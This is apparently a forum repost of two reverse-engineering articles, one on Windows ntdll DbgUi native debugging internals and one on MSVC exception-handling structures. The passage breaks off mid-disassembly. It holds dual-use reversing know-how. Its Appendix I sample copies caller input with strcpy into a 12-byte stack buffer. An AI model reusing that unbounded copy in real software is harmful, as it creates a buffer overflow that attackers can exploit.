  9. Windows Native Debugging Internals Author: AlexIonescu Introduction In part two of this three part article series, the native interface to Windows debugging is dissected in detail. The reader is expected to have some basic knowledge of C and general NT Kernel architecture and semantics. Also, this is not an introduction on what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts. Native Debugging Now it's time to look at the native side of things, and how the wrapper layer inside ntdll.dll communicates with the kernel. The advantage of having the DbgUi layer is that it allows better separation between Win32 and the NT Kernel, which has always been a part of NT design. NTDLL and NTOSKRNL are built together, so it's normal for them to have intricate knowledge of each others. They share the same structures, they need to have the same system call IDs, etc. In a perfect world, the NT Kernel should have to know nothing about Win32. Additionally, it helps anyone that wants to write debugging capabilities inside a native application, or to write a fully-featured native-mode debugger. Without DbgUi, one would have to call the Nt*DebugObject APIs manually, and do some extensive pre/post processing in some cases. DbgUi simplifies all this work to a simple call, and provides a clean interface to do it. If the kernel changes internally, DbgUi will probably stay the same, only its internal code would be modified. We start our exploration with the function responsible for creating and associating a Debug Object with the current Process. Unlike in the Win32 world, there is a clear distinction between creating a Debug Object, and actually attaching to a process. NTSTATUSNTAPI DbgUiConnectToDbg(VOID) { OBJECT_ATTRIBUTES ObjectAttributes; /* Don't connect twice */ if (NtCurrentTeb()->DbgSsReserved[1]) return STATUS_SUCCESS; /* Setup the Attributes */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, 0); /* Create the object */ return ZwCreateDebugObject(&NtCurrentTeb()->DbgSsReserved[1], DEBUG_OBJECT_ALL_ACCESS, &ObjectAttributes, TRUE); } As you can see, this is a trivial implementation, but it shows us two things. Firstly, a thread can only have one debug object associated to it, and secondly, the handle to this object is stored in the TEB's DbgSsReserved array field. Recall that in Win32, the first index, [0], is where the Thread Data was stored. We've now learnt that [1] is where the handle is stored. Now let's see how attaching and detaching are done: NTSTATUSNTAPI DbgUiDebugActiveProcess(IN HANDLE Process) { NTSTATUS Status; /* Tell the kernel to start debugging */ Status = NtDebugActiveProcess(Process, NtCurrentTeb()->DbgSsReserved[1]); if (NT_SUCCESS(Status)) { /* Now break-in the process */ Status = DbgUiIssueRemoteBreakin(Process); if (!NT_SUCCESS(Status)) { /* We couldn't break-in, cancel debugging */ DbgUiStopDebugging(Process); } } /* Return status */ return Status; } NTSTATUS NTAPI DbgUiStopDebugging(IN HANDLE Process) { /* Call the kernel to remove the debug object */ return NtRemoveProcessDebug(Process, NtCurrentTeb()->DbgSsReserved[1]); } Again, these are very simple implementations. We can learn, however, that the kernel is not responsible for actually breaking inside the remote process, but that this is done by the native layer. This DbgUiIssueRemoteBreakin API is also used by Win32 when calling DebugBreakProcess, so let's look at it: NTSTATUSNTAPI DbgUiIssueRemoteBreakin(IN HANDLE Process) { HANDLE hThread; CLIENT_ID ClientId; NTSTATUS Status; /* Create the thread that will do the breakin */ Status = RtlCreateUserThread(Process, NULL, FALSE, 0, 0, PAGE_SIZE, (PVOID)DbgUiRemoteBreakin, NULL, &hThread, &ClientId); /* Close the handle on success */ if(NT_SUCCESS(Status)) NtClose(hThread); /* Return status */ return Status; } All it does is create a remote thread inside the process, and then return to the caller. Does that remote thread do anything magic? Let's see: VOIDNTAPI DbgUiRemoteBreakin(VOID) { /* Make sure a debugger is enabled; if so, breakpoint */ if (NtCurrentPeb()->BeingDebugged) DbgBreakPoint(); /* Exit the thread */ RtlExitUserThread(STATUS_SUCCESS); } Nothing special at all; the thread makes sure that the process is really being debugged, and then issues a breakpoint. And, because this API is exported, you can call it locally from your own process to issue a debug break (but note that you will kill your own thread). In our look at the Win32 Debugging implementation, we've noticed that the actual debug handle is never used, and that calls always go through DbgUi. Then the NtSetInformationDebugObject system call was called, a special DbgUi API was called before, to actually get the debug object associated with the thread. This API also has a counterpart, so let's see both in action: HANDLENTAPI DbgUiGetThreadDebugObject(VOID) { /* Just return the handle from the TEB */ return NtCurrentTeb()->DbgSsReserved[1]; } VOID NTAPI DbgUiSetThreadDebugObject(HANDLE DebugObject) { /* Just set the handle in the TEB */ NtCurrentTeb()->DbgSsReserved[1] = DebugObject; } For those familiar with object-oriented programming, this will seem similar to the concept of accessor and mutator methods. Even though Win32 has perfect access to this handle and could simply read it on its own, the NT developers decided to make DbgUi much like a class, and make sure access to the handle goes through these public methods. This design allows the debug handle to be stored anywhere else if necessary, and only these two APIs will require changes, instead of multiple DLLs in Win32. Now for a visit of the wait/continue functions, which under Win32 were simply wrappers: NTSTATUSNTAPI DbgUiContinue(IN PCLIENT_ID ClientId, IN NTSTATUS ContinueStatus) { /* Tell the kernel object to continue */ return ZwDebugContinue(NtCurrentTeb()->DbgSsReserved[1], ClientId, ContinueStatus); } NTSTATUS NTAPI DbgUiWaitStateChange(OUT PDBGUI_WAIT_STATE_CHANGE DbgUiWaitStateCange, IN PLARGE_INTEGER TimeOut OPTIONAL) { /* Tell the kernel to wait */ return NtWaitForDebugEvent(NtCurrentTeb()->DbgSsReserved[1], TRUE, TimeOut, DbgUiWaitStateCange); } Not surprisingly, these functions are also wrappers in DbgUi. However, this is where things start to get interesting, since if you'll recall, DbgUi uses a completely different structure for debug events, called DBGUI_WAIT_STATE_CHANGE. There is one API that we have left to look at, which does the conversion, so first, let's look at the documentation for this structure: //// User-Mode Debug State Change Structure // typedef struct _DBGUI_WAIT_STATE_CHANGE { DBG_STATE NewState; CLIENT_ID AppClientId; union { struct { HANDLE HandleToThread; DBGKM_CREATE_THREAD NewThread; } CreateThread; struct { HANDLE HandleToProcess; HANDLE HandleToThread; DBGKM_CREATE_PROCESS NewProcess; } CreateProcessInfo; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_EXCEPTION Exception; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; } StateInfo; } DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; The fields should be pretty self-explanatory, so let's look at the DBG_STATE enumeration: //// Debug States // typedef enum _DBG_STATE { DbgIdle, DbgReplyPending, DbgCreateThreadStateChange, DbgCreateProcessStateChange, DbgExitThreadStateChange, DbgExitProcessStateChange, DbgExceptionStateChange, DbgBreakpointStateChange, DbgSingleStepStateChange, DbgLoadDllStateChange, DbgUnloadDllStateChange } DBG_STATE, *PDBG_STATE; If you take a look at the Win32 DEBUG_EVENT structure and associated debug event types, you'll notice some differences which might be useful to you. For starters, Exceptions, Breakpoints and Single Step exceptions are handled differently. In the Win32 world, only two distinctions are made: RIP_EVENT for exceptions, and EXCEPTION_DEBUG_EVENT for a debug event. Although code can later figure out if this was a breakpoint or single step, this information comes directly in the native structure. You will also notice that OUTPUT_DEBUG_STRING event is missing. Here, it's DbgUi that's at a disadvantage, since the information is sent as an Exception, and post-processing is required (which we'll take a look at soon). There are also two more states that Win32 does not support, which is the Idle state and the Reply Pending state. These don't offer much information from the point of view of a debugger, so they are ignored. Now let's take a look at the actual structures seen in the unions: //// Debug Message Structures // typedef struct _DBGKM_EXCEPTION { EXCEPTION_RECORD ExceptionRecord; ULONG FirstChance; } DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; typedef struct _DBGKM_CREATE_THREAD { ULONG SubSystemKey; PVOID StartAddress; } DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; typedef struct _DBGKM_CREATE_PROCESS { ULONG SubSystemKey; HANDLE FileHandle; PVOID BaseOfImage; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; DBGKM_CREATE_THREAD InitialThread; } DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; typedef struct _DBGKM_EXIT_THREAD { NTSTATUS ExitStatus; } DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; typedef struct _DBGKM_EXIT_PROCESS { NTSTATUS ExitStatus; } DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; typedef struct _DBGKM_LOAD_DLL { HANDLE FileHandle; PVOID BaseOfDll; ULONG DebugInfoFileOffset; ULONG DebugInfoSize; PVOID NamePointer; } DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; typedef struct _DBGKM_UNLOAD_DLL { PVOID BaseAddress; } DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; If you're familiar with the DEBUG_EVENT structure, you should notice some subtle differences. First of all, no indication of the process name, which explains why MSDN documents this field being optional and not used by Win32. You will also notice the lack of a pointer to the TEB in the thread structure. Finally, unlike new processes, Win32 does display the name of any new DLL loaded, but this also seems to be missing in the Load DLL structure; we'll see how this and other changes are dealt with soon. As far as extra information goes however, we have the "SubsystemKey" field. Because NT was designed to support multiple subsystems, this field is critical to identifying from which subsystem the new thread or process was created from. Windows 2003 SP1 adds support for debugging POSIX applications, and while I haven't looked at the POSIX debug APIs, I'm convinced they're built around the DbgUi implementation, and that this field is used differently by the POSIX library (much like Win32 ignores it). Now that we've seen the differences, the final API to look at is DbgUiConvertStateChangeStructure, which is responsible for doing these modifications and fixups: NTSTATUSNTAPI DbgUiConvertStateChangeStructure(IN PDBGUI_WAIT_STATE_CHANGE WaitStateChange, OUT PVOID Win32DebugEvent) { NTSTATUS Status; OBJECT_ATTRIBUTES ObjectAttributes; THREAD_BASIC_INFORMATION ThreadBasicInfo; LPDEBUG_EVENT DebugEvent = Win32DebugEvent; HANDLE ThreadHandle; /* Write common data */ DebugEvent->dwProcessId = (DWORD)WaitStateChange-> AppClientId.UniqueProcess; DebugEvent->dwThreadId = (DWORD)WaitStateChange->AppClientId.UniqueThread; /* Check what kind of even this is */ switch (WaitStateChange->NewState) { /* New thread */ case DbgCreateThreadStateChange: /* Setup Win32 code */ DebugEvent->dwDebugEventCode = CREATE_THREAD_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateThread.hThread = WaitStateChange->StateInfo.CreateThread.HandleToThread; DebugEvent->u.CreateThread.lpStartAddress = WaitStateChange->StateInfo.CreateThread.NewThread.StartAddress; /* Query the TEB */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. CreateThread.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } break; /* New process */ case DbgCreateProcessStateChange: /* Write Win32 debug code */ DebugEvent->dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT; /* Copy data over */ DebugEvent->u.CreateProcessInfo.hProcess = WaitStateChange->StateInfo.CreateProcessInfo.HandleToProcess; DebugEvent->u.CreateProcessInfo.hThread = WaitStateChange->StateInfo.CreateProcessInfo.HandleToThread; DebugEvent->u.CreateProcessInfo.hFile = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. FileHandle; DebugEvent->u.CreateProcessInfo.lpBaseOfImage = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. BaseOfImage; DebugEvent->u.CreateProcessInfo.dwDebugInfoFileOffset = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoFileOffset; DebugEvent->u.CreateProcessInfo.nDebugInfoSize = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. DebugInfoSize; DebugEvent->u.CreateProcessInfo.lpStartAddress = WaitStateChange->StateInfo.CreateProcessInfo.NewProcess. InitialThread.StartAddress; /* Query TEB address */ Status = NtQueryInformationThread(WaitStateChange->StateInfo. CreateProcessInfo.HandleToThread, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); if (!NT_SUCCESS(Status)) { /* Failed to get PEB address */ DebugEvent->u.CreateThread.lpThreadLocalBase = NULL; } else { /* Write PEB Address */ DebugEvent->u.CreateThread.lpThreadLocalBase = ThreadBasicInfo.TebBaseAddress; } /* Clear image name */ DebugEvent->u.CreateProcessInfo.lpImageName = NULL; DebugEvent->u.CreateProcessInfo.fUnicode = TRUE; break; /* Thread exited */ case DbgExitThreadStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_THREAD_DEBUG_EVENT; DebugEvent->u.ExitThread.dwExitCode = WaitStateChange->StateInfo.ExitThread.ExitStatus; break; /* Process exited */ case DbgExitProcessStateChange: /* Write the Win32 debug code and the exit status */ DebugEvent->dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT; DebugEvent->u.ExitProcess.dwExitCode = WaitStateChange->StateInfo.ExitProcess.ExitStatus; break; /* Any sort of exception */ case DbgExceptionStateChange: case DbgBreakpointStateChange: case DbgSingleStepStateChange: /* Check if this was a debug print */ if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_PRINTEXCEPTION_C) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = OUTPUT_DEBUG_STRING_EVENT; /* Copy debug string information */ DebugEvent->u.DebugString.lpDebugStringData = (PVOID)WaitStateChange-> StateInfo.Exception.ExceptionRecord. ExceptionInformation[1]; DebugEvent->u.DebugString.nDebugStringLength = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; DebugEvent->u.DebugString.fUnicode = FALSE; } else if (WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionCode == DBG_RIPEXCEPTION) { /* Set the Win32 code */ DebugEvent->dwDebugEventCode = RIP_EVENT; /* Set exception information */ DebugEvent->u.RipInfo.dwType = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[1]; DebugEvent->u.RipInfo.dwError = WaitStateChange->StateInfo.Exception.ExceptionRecord. ExceptionInformation[0]; } else { /* Otherwise, this is a debug event, copy info over */ DebugEvent->dwDebugEventCode = EXCEPTION_DEBUG_EVENT; DebugEvent->u.Exception.ExceptionRecord = WaitStateChange->StateInfo.Exception.ExceptionRecord; DebugEvent->u.Exception.dwFirstChance = WaitStateChange->StateInfo.Exception.FirstChance; } break; /* DLL Load */ case DbgLoadDllStateChange : /* Set the Win32 debug code */ DebugEvent->dwDebugEventCode = LOAD_DLL_DEBUG_EVENT; /* Copy the rest of the data */ DebugEvent->u.LoadDll.lpBaseOfDll = WaitStateChange->StateInfo.LoadDll.BaseOfDll; DebugEvent->u.LoadDll.hFile = WaitStateChange->StateInfo.LoadDll.FileHandle; DebugEvent->u.LoadDll.dwDebugInfoFileOffset = WaitStateChange->StateInfo.LoadDll.DebugInfoFileOffset; DebugEvent->u.LoadDll.nDebugInfoSize = WaitStateChange->StateInfo.LoadDll.DebugInfoSize; /* Open the thread */ InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); Status = NtOpenThread(&ThreadHandle, THREAD_QUERY_INFORMATION, &ObjectAttributes, &WaitStateChange->AppClientId); if (NT_SUCCESS(Status)) { /* Query thread information */ Status = NtQueryInformationThread(ThreadHandle, ThreadBasicInformation, &ThreadBasicInfo, sizeof(ThreadBasicInfo), NULL); NtClose(ThreadHandle); } /* Check if we got thread information */ if (NT_SUCCESS(Status)) { /* Save the image name from the TIB */ DebugEvent->u.LoadDll.lpImageName = &((PTEB)ThreadBasicInfo.TebBaseAddress)-> Tib.ArbitraryUserPointer; } else { /* Otherwise, no name */ DebugEvent->u.LoadDll.lpImageName = NULL; } /* It's Unicode */ DebugEvent->u.LoadDll.fUnicode = TRUE; break; /* DLL Unload */ case DbgUnloadDllStateChange: /* Set Win32 code and DLL Base */ DebugEvent->dwDebugEventCode = UNLOAD_DLL_DEBUG_EVENT; DebugEvent->u.UnloadDll.lpBaseOfDll = WaitStateChange->StateInfo.UnloadDll.BaseAddress; break; /* Anything else, fail */ default: return STATUS_UNSUCCESSFUL; } /* Return success */ return STATUS_SUCCESS; } Let's take a look at the interesting fixups. First of all, the lack of a TEB pointer is easily fixed by calling NtQueryInformationThread with the ThreadBasicInformation type, which returns, among other things, a pointer to the TEB, which is then saved in the Win32 structure. As for Debug Strings, the API analyzes the exception code and looks for DBG_PRINTEXCEPTION_C, which has a specific exception record that is parsed and converted into a debug string output. So far so good, but perhaps the nastiest hack is present in the code for DLL loading. Because a loaded DLL doesn't have a structure like EPROCESS or ETHREAD in kernel memory, but in ntdll's private Ldr structures, the only thing that identifies it is a Section Object in memory for its memory mapped file. When the kernel gets a request to create a section for an executable memory mapped file, it saves the name of the file in a field inside the TEB (or TIB, rather) called ArbitraryUserPointer. This function then knows that a string is located there, and sets it as the pointer for the debug event's lpImageName member. This hack has been in NT every since the first builds, and as far as I know, it's still there in Vista. Could it be that hard to solve? Once again, we come to an end in our discussion, since there isn't much left in ntdll that deals with the Debug Object. Here's an overview of what was discussed in this part of the series: DbgUi provides a level of separation between the kernel and Win32 or other subsystems. It's written as a fully independent class, even having accessor and mutator methods instead of exposing its handles. The handle to a thread's Debug Object is stored in the second field of the DbgSsReserved array in the TEB. DbgUi allows a thread to have a single DebugObject, but using the native system calls allows you to do as many as you want. Most DbgUi APIs are simple wrappers around the NtXxxDebugObject system calls, and use the TEB handle to communicate. DbgUi is responsible for breaking into the attached process, not the kernel. DbgUi uses its own structure for debug events, which the kernel understands. In some ways, this structure provides more information about some events (such as the subsystem and whether this was a single step or a breakpoint exception), but in others, some information is missing (such as a pointer to the thread's TEB or a separate debug string structure). The TIB (located inside the TEB)'s ArbitraryPointer member contains the name of the loaded DLL during a Debug Event. Sursa: OpenRCE
  10. Reversing Microsoft Visual C++ Part I: Exception Handling Author: igorsk Abstract Microsoft Visual C++ is the most widely used compiler for Win32 so it is important for the Win32 reverser to be familiar with its inner working. Being able to recognize the compiler-generated glue code helps to quickly concentrate on the actual code written by the programmer. It also helps in recovering the high-level structure of the program. In part I of this 2-part article (see also: Part II: Classes, Methods and RTTI), I will concentrate on the stack layout, exception handling and related structures in MSVC-compiled programs. Some familiarity with assembler, registers, calling conventions etc. is assumed. Terms: Stack frame: A fragment of the stack segment used by a function. Usually contains function arguments, return-to-caller address, saved registers, local variables and other data specific to this function. On x86 (and most other architectures) caller and callee stack frames are contiguous. Frame pointer: A register or other variable that points to a fixed location inside the stack frame. Usually all data inside the stack frame is addressed relative to the frame pointer. On x86 it's usually ebp and it usually points just below the return address. Object: An instance of a (C++) class. Unwindable Object: A local object with auto storage-class specifier that is allocated on the stack and needs to be destructed when it goes out of scope. Stack UInwinding: Automatic destruction of such objects that happens when the control leaves the scope due to an exception. There are two types of exceptions that can be used in a C or C++ program. SEH exceptions (from "Structured Exception Handling"). Also known as Win32 or system exceptions. These are exhaustively covered in the famous Matt Pietrek article[1]. They are the only exceptions available to C programs. The compiler-level support includes keywords __try, __except, __finally and a few others. C++ exceptions (sometimes referred to as "EH"). Implemented on top of SEH, C++ exceptions allow throwing and catching of arbitrary types. A very important feature of C++ is automatic stack unwinding during exception processing, and MSVC uses a pretty complex underlying framework to ensure that it works properly in all cases. In the following diagrams memory addresses increase from top to bottom, so the stack grows "up". It's the way the stack is represented in IDA and opposite to the most other publications. Basic Frame Layout The most basic stack frame looks like following: ... Local variables Other saved registers Saved ebp Return address Function arguments ... Note: If frame pointer omission is enabled, saved ebp might be absent. SEH In cases where the compiler-level SEH (__try/__except/__finally) is used, the stack layout gets a little more complicated. SEH3 Stack Layout When there are no __except blocks in a function (only __finally), Saved ESP is not used. Scopetable is an array of records which describe each __try block and relationships between them: struct _SCOPETABLE_ENTRY { DWORD EnclosingLevel; void* FilterFunc; void* HandlerFunc; } For more details on SEH implementation see[1]. To recover try blocks watch how the try level variable is updated. It's assigned a unique number per try block, and nesting is described by relationship between scopetable entries. E.g. if scopetable entry i has EnclosingLevel=j, then try block j encloses try block i. The function body is considered to have try level -1. See Appendix 1 for an example. Buffer Overrun Protection The Whidbey (MSVC 2005) compiler adds some buffer overrun protection for the SEH frames. The full stack frame layout in it looks like following: SEH4 Stack Layout The GS cookie is present only if the function was compiled with /GS switch. The EH cookie is always present. The SEH4 scopetable is basically the same as SEH3 one, only with added header: struct _EH4_SCOPETABLE { DWORD GSCookieOffset; DWORD GSCookieXOROffset; DWORD EHCookieOffset; DWORD EHCookieXOROffset; _EH4_SCOPETABLE_RECORD ScopeRecord[1]; }; struct _EH4_SCOPETABLE_RECORD { DWORD EnclosingLevel; long (*FilterFunc)(); union { void (*HandlerAddress)(); void (*FinallyFunc)(); }; }; GSCookieOffset = -2 means that GS cookie is not used. EH cookie is always present. Offsets are ebp relative. Check is done the following way: (ebp+CookieXOROffset) ^ [ebp+CookieOffset] == _security_cookie Pointer to the scopetable in the stack is XORed with the _security_cookie too. Also, in SEH4 the outermost scope level is -2, not -1 as in SEH3. C++ Exception Model Implementation When C++ exceptions handling (try/catch) or unwindable objects are present in the function, things get pretty complex. C++ EH Stack Layout EH handler is different for each function (unlike the SEH case) and usually looks like this: (VC7+) mov eax, OFFSET __ehfuncinfo jmp ___CxxFrameHandler __ehfuncinfo is a structure of type FuncInfo which fully describes all try/catch blocks and unwindable objects in the function. struct FuncInfo { // compiler version. // 0x19930520: up to VC6, 0x19930521: VC7.x(2002-2003), 0x19930522: VC8 (2005) DWORD magicNumber; // number of entries in unwind table int maxState; // table of unwind destructors UnwindMapEntry* pUnwindMap; // number of try blocks in the function DWORD nTryBlocks; // mapping of catch blocks to try blocks TryBlockMapEntry* pTryBlockMap; // not used on x86 DWORD nIPMapEntries; // not used on x86 void* pIPtoStateMap; // VC7+ only, expected exceptions list (function "throw" specifier) ESTypeList* pESTypeList; // VC8+ only, bit 0 set if function was compiled with /EHs int EHFlags; }; Unwind map is similar to the SEH scopetable, only without filter functions: struct UnwindMapEntry { int toState; // target state void (*action)(); // action to perform (unwind funclet address) }; Try block descriptor. Describes a try{} block with associated catches. struct TryBlockMapEntry { int tryLow; int tryHigh; // this try {} covers states ranging from tryLow to tryHigh int catchHigh; // highest state inside catch handlers of this try int nCatches; // number of catch handlers HandlerType* pHandlerArray; //catch handlers table }; Catch block descriptor. Describes a single catch() of a try block. struct HandlerType { // 0x01: const, 0x02: volatile, 0x08: reference DWORD adjectives; // RTTI descriptor of the exception type. 0=any (ellipsis) TypeDescriptor* pType; // ebp-based offset of the exception object in the function stack. // 0 = no object (catch by type) int dispCatchObj; // address of the catch handler code. // returns address where to continues execution (i.e. code after the try block) void* addressOfHandler; }; List of expected exceptions (implemented but not enabled in MSVC by default, use /d1ESrt to enable). struct ESTypeList { // number of entries in the list int nCount; // list of exceptions; it seems only pType field in HandlerType is used HandlerType* pTypeArray; }; RTTI type descriptor. Describes a single C++ type. Used here to match the thrown exception type with catch type. struct TypeDescriptor { // vtable of type_info class const void * pVFTable; // used to keep the demangled name returned by type_info::name() void* spare; // mangled type name, e.g. ".H" = "int", ".?AUA@@" = "struct A", ".?AVA@@" = "class A" char name[0]; }; Unlike SEH, each try block doesn't have a single associated state value. The compiler changes the state value not only on entering/leaving a try block, but also for each constructed/destroyed object. That way it's possible to know which objects need unwinding when an exception happens. You can still recover try blocks boundaries by inspecting the associated state range and the addresses returned by catch handlers (see Appendix 2). Throwing C++ Exceptions throw statements are converted into calls of _CxxThrowException(), which actually raises a Win32 (SEH) exception with the code 0xE06D7363 ('msc'|0xE0000000). The custom parameters of the Win32 exception include pointers to the exception object and its ThrowInfo structure, using which the exception handler can match the thrown exception type against the types expected by catch handlers. struct ThrowInfo { // 0x01: const, 0x02: volatile DWORD attributes; // exception destructor void (*pmfnUnwind)(); // forward compatibility handler int (*pForwardCompat)(); // list of types that can catch this exception. // i.e. the actual type and all its ancestors. CatchableTypeArray* pCatchableTypeArray; }; struct CatchableTypeArray { // number of entries in the following array int nCatchableTypes; CatchableType* arrayOfCatchableTypes[0]; }; Describes a type that can catch this exception. struct CatchableType { // 0x01: simple type (can be copied by memmove), 0x02: can be caught by reference only, 0x04: has virtual bases DWORD properties; // see above TypeDescriptor* pType; // how to cast the thrown object to this type PMD thisDisplacement; // object size int sizeOrOffset; // copy constructor address void (*copyFunction)(); }; // Pointer-to-member descriptor. struct PMD { // member offset int mdisp; // offset of the vbtable (-1 if not a virtual base) int pdisp; // offset to the displacement value inside the vbtable int vdisp; }; We'll delve more into this in the next article. Prologs and Epilogs Instead of emitting the code for setting up the stack frame in the function body, the compiler might choose to call specific prolog and epilog functions instead. There are several variants, each used for specific function type: [TABLE] [TR] [TD=class: table_sub_header]Name[/TD] [TD=class: table_sub_header]Type[/TD] [TD=class: table_sub_header, align: right]EH Cookie[/TD] [TD=class: table_sub_header, align: right]GS Cookie[/TD] [TD=class: table_sub_header, align: right]Catch Handlers[/TD] [/TR] [TR=class: table_row_1] [TD]_SEH_prolog/_SEH_epilog [/TD] [TD]SEH3 [/TD] [TD=align: right]-[/TD] [TD=align: right]-[/TD] [TD=align: right] [/TD] [/TR] [TR=class: table_row_2] [TD]_SEH_prolog4/_SEH_epilog4 S [/TD] [TD]EH4 [/TD] [TD=align: right]+[/TD] [TD=align: right]-[/TD] [TD=align: right] [/TD] [/TR] [TR=class: table_row_1] [TD]_SEH_prolog4_GS/_SEH_epilog4_GS [/TD] [TD]SEH4 [/TD] [TD=align: right]+[/TD] [TD=align: right]+[/TD] [TD=align: right] [/TD] [/TR] [TR=class: table_row_2] [TD]_EH_prolog [/TD] [TD]C++ EH[/TD] [TD=align: right]-[/TD] [TD=align: right]-[/TD] [TD=align: right]+/-[/TD] [/TR] [TR=class: table_row_1] [TD]_EH_prolog3/_EH_epilog3 [/TD] [TD]C++ EH[/TD] [TD=align: right]+[/TD] [TD=align: right]-[/TD] [TD=align: right]- [/TD] [/TR] [TR=class: table_row_2] [TD]_EH_prolog3_catch/_EH_epilog3 [/TD] [TD]C++ EH[/TD] [TD=align: right]+[/TD] [TD=align: right]-[/TD] [TD=align: right]+ [/TD] [/TR] [TR=class: table_row_1] [TD]_EH_prolog3_GS/_EH_epilog3_GS [/TD] [TD]C++ EH[/TD] [TD=align: right]+[/TD] [TD=align: right]+[/TD] [TD=align: right]- [/TD] [/TR] [TR=class: table_row_2] [TD]_EH_prolog3_catch_GS/_EH_epilog3_catch_GS[/TD] [TD]C++ EH[/TD] [TD=align: right]+[/TD] [TD=align: right]+[/TD] [TD=align: right]+ [/TD] [/TR] [/TABLE] SEH2 Apparently was used by MSVC 1.XX (exported by crtdll.dll). Encountered in some old NT programs. ... Saved edi Saved esi Saved ebx Next SEH frame Current SEH handler (__except_handler2) Pointer to the scopetable Try level Saved ebp (of this function) Exception pointers Local variables Saved ESP Local variables Callee EBP Return address Function arguments ... Appendix I: Sample SEH Program Let's consider the following sample disassembly. func1 proc near _excCode = dword ptr -28hbuf = byte ptr -24h_saved_esp = dword ptr -18h_exception_info = dword ptr -14h_next = dword ptr -10h_handler = dword ptr -0Ch_scopetable = dword ptr -8_trylevel = dword ptr -4str = dword ptr 8 push ebp mov ebp, esp push -1 push offset _func1_scopetable push offset _except_handler3 mov eax, large fs:0 push eax mov large fs:0, esp add esp, -18h push ebx push esi push edi ; --- end of prolog --- mov [ebp+_trylevel], 0 ;trylevel -1 -> 0: beginning of try block 0 mov [ebp+_trylevel], 1 ;trylevel 0 -> 1: beginning of try block 1 mov large dword ptr ds:123, 456 mov [ebp+_trylevel], 0 ;trylevel 1 -> 0: end of try block 1 jmp short _endoftry1 _func1_filter1: ; __except() filter of try block 1 mov ecx, [ebp+_exception_info] mov edx, [ecx+EXCEPTION_POINTERS.ExceptionRecord] mov eax, [edx+EXCEPTION_RECORD.ExceptionCode] mov [ebp+_excCode], eax mov ecx, [ebp+_excCode] xor eax, eax cmp ecx, EXCEPTION_ACCESS_VIOLATION setz al retn _func1_handler1: ; beginning of handler for try block 1 mov esp, [ebp+_saved_esp] push offset aAccessViolatio ; "Access violation" call _printf add esp, 4 mov [ebp+_trylevel], 0 ;trylevel 1 -> 0: end of try block 1 _endoftry1: mov edx, [ebp+str] push edx lea eax, [ebp+buf] push eax call _strcpy add esp, 8 mov [ebp+_trylevel], -1 ; trylevel 0 -> -1: end of try block 0 call _func1_handler0 ; execute __finally of try block 0 jmp short _endoftry0 _func1_handler0: ; __finally handler of try block 0 push offset aInFinally ; "in finally" call _puts add esp, 4 retn _endoftry0: ; --- epilog --- mov ecx, [ebp+_next] mov large fs:0, ecx pop edi pop esi pop ebx mov esp, ebp pop ebp retnfunc1 endp _func1_scopetable ;try block 0 dd -1 ;EnclosingLevel dd 0 ;FilterFunc dd offset _func1_handler0 ;HandlerFunc ;try block 1 dd 0 ;EnclosingLevel dd offset _func1_filter1 ;FilterFunc dd offset _func1_handler1 ;HandlerFunc The try block 0 has no filter, therefore its handler is a __finally{} block. EnclosingLevel of try block 1 is 0, so it's placed inside try block 0. Considering this, we can try to reconstruct the function structure: void func1 (char* str) { char buf[12]; __try // try block 0 { __try // try block 1 { *(int*)123=456; } __except(GetExceptCode() == EXCEPTION_ACCESS_VIOLATION) { printf("Access violation"); } strcpy(buf,str); } __finally { puts("in finally"); } } Appendix II: Sample Program with C++ Exceptions func1 proc near _a1 = dword ptr -24h_exc = dword ptr -20he = dword ptr -1Cha2 = dword ptr -18ha1 = dword ptr -14h_saved_esp = dword ptr -10h_next = dword ptr -0Ch_handler = dword ptr -8_state = dword ptr -4 push ebp mov ebp, esp push 0FFFFFFFFh push offset func1_ehhandler mov eax, large fs:0 push eax mov large fs:0, esp push ecx sub esp, 14h push ebx push esi push edi mov [ebp+_saved_esp], esp ; --- end of prolog --- lea ecx, [ebp+a1] call A::A(void) mov [ebp+_state], 0 ; state -1 -> 0: a1 constructed mov [ebp+a1], 1 ; a1.m1 = 1 mov byte ptr [ebp+_state], 1 ; state 0 -> 1: try { lea ecx, [ebp+a2] call A::A(void) mov [ebp+_a1], eax mov byte ptr [ebp+_state], 2 ; state 2: a2 constructed mov [ebp+a2], 2 ; a2.m1 = 2 mov eax, [ebp+a1] cmp eax, [ebp+a2] ; a1.m1 == a2.m1? jnz short loc_40109F mov [ebp+_exc], offset aAbc ; _exc = 